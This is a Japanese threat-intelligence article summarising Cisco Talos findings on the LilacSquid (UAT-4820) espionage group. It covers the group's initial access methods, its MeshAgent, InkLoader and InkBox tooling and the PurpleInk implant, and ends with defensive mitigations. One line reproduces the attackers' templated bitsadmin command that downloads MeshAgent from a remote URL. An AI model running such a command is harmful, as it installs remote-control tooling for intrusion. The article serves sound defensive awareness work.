Cisco Talos の新たなレポートで、LilacSquid(UAT-4820)として知られる脅威アクターの活動が明らかになりました。この脅威アクターは、脆弱なウェブアプリケーションを悪用したり、侵害されたリモートデスクトップ保護の認証情報を利用したりして、カスタムの PurpleInk マルウェアをシステムに感染させ、システムを侵害します。これまでに、米国、欧州、アジアの様々な業種の組織がデータ窃盗目的で被害を受けていますが、まだ特定されていない業種も被害を受けている可能性があります。
LilacSquid とは誰ですか?
LilacSquid は、少なくとも 2021 年から活動しているサイバースパイ活動の脅威アクターです。UAT-4820 としても知られています。
LilacSquid がこれまでターゲットにしてきた業界には次のようなものがあります。
- 米国の研究・産業部門向けソフトウェアを構築するIT組織
- ヨーロッパのエネルギー分野の組織。
- アジアの製薬業界の組織。
脅威アクターが用いる複数の戦術、手法、手順は、北朝鮮の高度な持続的脅威グループ、すなわちAndarielとその傘下組織であるLazarusのものと類似しています。これらのTTP(戦術、技術、手順)の中でも、最初の侵害後のアクセス維持にMeshAgentソフトウェアを使用していること、そしてプロキシおよびトンネリングツールを多用していることから、LilacSquidがLazarusと関連し、ツール、インフラストラクチャ、その他のリソースを共有している可能性が示唆されます。
LilacSquid のターゲットへの初期アクセス方法は何ですか?
最初の方法: 脆弱なWebアプリケーションの悪用
LilacSquid がターゲットを侵害するために使用する最初の方法は、脆弱な Web アプリケーションをうまく悪用することです。
エクスプロイトが完了すると、脅威アクターはマルウェア用の作業フォルダを設定するためのスクリプトを展開し、オープンソースのリモート管理ツールであるMeshAgentをダウンロードして実行します。ダウンロードは通常、Microsoft Windowsオペレーティングシステムの正規ツールであるbitsadminを介して行われます。
bitsadmin /transfer -job_name- /download /priority normal -remote_URL- -local_path_for_MeshAgent- -local_path_for_MeshAgent- connect
MeshAgent は、被害者の識別子とコマンド アンド コントロールのアドレスを含む、MSH ファイルと呼ばれるテキスト構成ファイルを使用します。
このツールを使用すると、オペレーターはターゲットからすべてのデバイスを一覧表示したり、デスクトップを表示および制御したり、制御対象システム上のファイルを管理したり、デバイスからソフトウェアおよびハードウェア情報を収集したりできます。
MeshAgent はインストールされて実行されると、通信のプロキシおよびトンネリングを行うオープンソース ツールである Secure Socket Funneling や、InkLoader/PurpleInk マルウェア インプラントなどの他のツールをアクティブ化するために使用されます。
2番目の方法: 侵害されたRDP資格情報の使用
LilacSquidが標的にアクセスするために使用する2つ目の方法は、侵害されたRDP認証情報を使用することです。この方法を使用する場合、LilacSquidはMeshAgentを展開して攻撃を続行するか、シンプルながらも効果的なマルウェアローダーであるInkLoaderを導入するかを選択します。
InkLoaderは別のペイロードであるPurpleInkを実行します。このローダーはPurpleInkの実行のみが確認されていますが、他のマルウェアインプラントの展開にも使用される可能性があります。
LilacSquidが使用するもう一つのローダーはInkBoxです。これは、ドライブ上のハードコードされたファイルパスからコンテンツを読み取り、復号します。復号されたコンテンツは、コンピュータ上で実行されているInkBoxプロセス内のエントリポイントを呼び出すことで実行されます。この復号されたコンテンツこそがPurpleInkマルウェアです。
PurpleInk マルウェアとは何ですか?
LilacSquidの脅威アクターが使用する主なインプラントであるPurpleInkは、少なくとも2014年からオンラインで入手可能なリモートアクセスツールであるQuasarRATをベースにしています。PurpleInkは2021年にQuasarRATをベースに開発され、現在も更新が続けられています。検出を困難にするため、高度な難読化が施されています。
マルウェアは、C2 サーバーの IP アドレスとポート番号を含む base64 でエンコードされた構成ファイルを使用します。
PurpleInkは、ドライブ情報(ボリュームラベル、ルートディレクトリ名、ドライブの種類とフォーマットなど)、実行中のプロセス情報、システム情報(メモリサイズ、ユーザー名、コンピュータ名、IPアドレス、コンピュータの稼働時間など)といった基本情報を収集できます。また、フォルダ、ファイル名、サイズを列挙し、ファイルの内容を置き換えたり追加したりすることも可能です。さらに、PurpleInkはリモートシェルを起動し、指定されたリモートアドレス(通常はプロキシサーバー)との間でデータを送受信する機能も備えています。
LilacSquidのサイバーセキュリティリスクを軽減する方法
LilacSquid による初期の侵害操作から組織を保護するには、次のことが必要です。
- インターネットに接続するすべてのウェブアプリケーションを最新の状態に保ち、パッチを適用してください。さらに、他の一般的な脆弱性による侵害を回避するために、すべてのハードウェア、オペレーティングシステム、ソフトウェアを最新の状態に保ち、パッチを適用する必要があります。
- 従業員からの RDP 接続に厳格なポリシーを適用し、可能な場合は多要素認証を導入して、攻撃者が RDP 経由で企業ネットワークにログインできないようにします。
- 特にツールが内部で使用されていない場合は、システム上の MeshAgent 構成ファイルを探します。
- コードをダウンロードまたは実行するために bitsadmin ツールを使用する場合は、注意深く分析してください。
- ネットワーク通信を監視して、特殊なポート上の接続や、ドメインではなく外部 IP アドレスに直接送信される通信を検出します。
- 疑わしいアクティビティを検出するために、エンドポイントに検出ソリューション(エンドポイント検出および応答または拡張検出および応答)を展開します。
- サイバー脅威、特にフィッシング攻撃を検出して報告する方法についての従業員の意識を高めます。
開示:私はトレンドマイクロに勤務していますが、この記事で述べられている意見は私自身のものです。
